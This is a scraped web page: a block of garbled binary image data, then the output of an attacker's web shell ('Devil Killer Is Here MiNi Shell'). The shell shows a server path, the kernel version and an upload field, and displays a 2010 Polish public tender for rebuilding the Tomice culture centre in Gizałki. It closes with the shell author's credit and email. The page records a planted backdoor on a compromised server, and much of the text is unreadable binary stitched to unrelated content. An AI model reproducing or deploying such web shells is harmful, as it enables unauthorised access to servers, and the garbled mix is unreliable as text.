JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100126/23026-N-2010.html

<p class="kh_header"><b>Gizałki: Przebudowa Gminnego Centrum Kultury w Tomicach</b><br>
<b>Numer ogłoszenia: 23026 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminne Centrum Kultury , ul. Kaliska 28, 63-308 Gizałki, woj. wielkopolskie, tel. 0-62 7411 517, faks 0-62 7411 195.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gizalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa Gminnego Centrum Kultury w Tomicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przebudowa Gminnego Centrum Kultury w Tomicach. Zadanie realizowane będzie na działce nr 459 w miejscowości Tomice, gmina Gizałki, powiat pleszewski, województwo wielkopolskie.
W ramach przebudowy przewiduje się:   
Branża budowlana:
a) roboty rozbiórkowe 
b) roboty remontowo - budowlane stanu surowego 
c) roboty termo-modernizacyjne
d) roboty wykończeniowe budowlane
e) roboty uzupełniające instalacyjne
Branża instalacyjna:
a) kotłownia olejowa - technologia
b) wentylacja kotłowni olejowej
c) układ solarny
d) instalacja wodno kanalizacyjna
e) wewnętrzna instalacja kanalizacji sanitarnej
f) roboty elektryczne
g) wyposażenie p-poż, UDT
h) instalacja paliwowa
i) roboty montażowe wewnętrzne instalacji c.o
j) wewnętrzna instalacja c.o  grzejniki
k) kanalizacja sanitarna
l) roboty budowlane
Szczegółowy zakres robót zawarto w przedmiarach robót, kosztorysach ofertowych oraz projekcie budowlanym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.26.25.00-6, 45.32.10.00-3, 45.40.00.00-1, 45.31.56.00-4, 45.33.11.10-0, 45.33.12.10-1, 45.33.10.00-6, 45.33.00.00-9, 44.16.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 18 000,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> A. Warunki wymagane od wykonawcy
O udzielenie zamówienia może ubiegać się wykonawca, który spełnia warunki, dotyczące: 
1. Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2. Posiadania sytuacji ekonomicznej i finansowej
3. Posiadania wiedzy i doświadczenia
4. Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
5. Posiadania doświadczenia wykonawcy
6. jest ubezpieczony od odpowiedzialności cywilnej OC w zakresie prowadzonej działalności gospodarczej. Wysokość wymaganego ubezpieczenia 300 000,00 PLN
7. złożył wymagane oświadczenia, dokumenty i spełnił inne wymagania określone w ustawie, SIWZ i w ogłoszeniu do składania ofert.
Z ubiegania się o zmówienie publiczne wyklucza się wykonawców, którzy nie wykazali spełnienia warunków udziału w postępowaniu o zamówienie publiczne, o którym mowa w art. 22 ust. 1 oraz podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
Ocena spełnienia warunków udziału  w postępowaniu zostanie dokonana wg formy spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez zamawiającego i podane w SIWZ) dołączone do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż wykonawca spełnia wyżej wymienione warunki.
B. Warunki wykonania zamówienia 
Wykonawca składający ofertę musi spełnić następujące warunki wykonania zamówienia, a mianowicie:
1. Zapewni gwarancję wykonania i serwisu
2. Warunki płatności
3. Warunki realizacji
4. Kosztorys ofertowy
5. Oferowane warunki wykonania zamówienia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.Dokumenty potwierdzające spełnienie warunków wymaganych od wykonawcy
1. Oświadczenie wykonawcy w trybie art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy PZP 
1.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.2. Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym, 
1.3. Dokument stwierdzający, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.4. Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.5. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
1.6. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.7. Polisa lub inny dokument ubezpieczenia oferenta od odpowiedzialności cywilnej / OC / w zakresie  realizowanego zadania.
1.8. Dowód wpłacenia /wniesienia/ wadium.
1.9. Upoważnienie do podpisania oferty o ile nie wynika ono z w/w dokumentów.

2. Informacja na temat sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia na  załączniku nr 2 Sytuacja ekonomiczna i finansowa wraz z udokumentowaniem wykazanych danych za pomocą:
1/ sprawozdania finansowego, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty, zysk oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
2/ informacji banku, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzającej wysokość posiadanych środków  finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3/ polisy lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

3. Informacja na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego
w okresie ostatnich 3 lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie oraz wykaz personelu pracowniczego odpowiedzialnego za realizację zamówienia z  zadeklarowaniem pracowników do pełnienia funkcji kierownika budowy, kierowników robót na załączniku nr 3 Potencjał kadrowy wraz z udokumentowaniem ich doświadczenia i kwalifikacji zawodowych stosownie do zadeklarowanej roli w realizacji zamówienia  /dyplomy, uprawnienia, zaświadczenie o przynależności do Polskiej Izby Inżynierów Budownictwa,  opis doświadczenia/.

4. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada wykonawca na załączniku nr 4 Potencjał techniczny. 

5. Wykaz wykonanych w okresie ostatniego 5 lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających  swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, na załączniku nr 5 Doświadczenie wykonawcy z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie (referencje). W przypadku  wykazania zamówień wykonanych na rzecz zamawiającego, wykonawca nie ma potrzeby uzyskiwania i załączania referencji.

6. Dane dotyczące podwykonawców i zakresu powierzonych im części zamówienia   / pojedynczych osób -zleceniobiorców podlegających kierownictwu oferenta, bądź przedsiębiorców - działających samodzielnie na podstawie umowy o dzieło, o roboty budowlane lub innej umowy cywilnoprawnej/  jeśli wykonawca przewiduje wykorzystanie podwykonawców lub jest zmuszony do ich wykorzystania ze względu na niepełny zakres swojej działalności gospodarczej w stosunku do zakresu objętego zamówieniem na załączniku nr 6 Podwykonawcy  wraz z oświadczeniem podwykonawcy o współpracy  z wykonawcą na załączniku nr  6A  Zobowiązanie do współpracy będącego jego uzupełnieniem i zawierającego w zakresie powierzonej części zamówienia: 
 - wykaz personelu odpowiedzialnego za realizację zamówienia wraz z zadeklarowaniem pracownika do pełnienia funkcji kierownika robót,
- wykaz niezbędnych do wykonania zamówienia w pełni sprawnych jednostek sprzętowych.
- aktualny dokument stanowiący podstawę prawną do prowadzenia przez podwykonawcę działalności gospodarczej,
- dyplomy, uprawnienia i zaświadczenie o przynależności do Polskiej Izby Inżynierów Budownictwa stosownie do roli w realizacji zamówienia.
W szczególności dotyczyć to winno zakresu robót związanego z rozbiórką i utylizacją istniejącego pokrycia dachowego wykonanego z płyt azbestowych.

B. Dokumenty potwierdzające spełnienie warunków wykonania zamówienia  
1. Oferta na formularzu ofertowym.
2. Karta gwarancji i serwisu jako załącznik nr 7 zawierająca szczegółowe warunki udzielanej  
gwarancji .
3. Kosztorys ofertowy - szczegółowy  jako załącznik nr 8 sporządzony zgodnie z przedmiarem robót.
4. Zaparafowany projekt umowy jako załącznik nr 9.

Wszystkie ww. dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osoby uprawnione do składania oświadczeń woli w imieniu wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gizalki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminne Centrum Kultury
ul. Kaliska 28
63-308 Gizałki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2010 godzina 12:00, miejsce: Budynek Urzędu Gminy Gizałki, ul. Kaliska 28, 63-308 Gizałki, SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com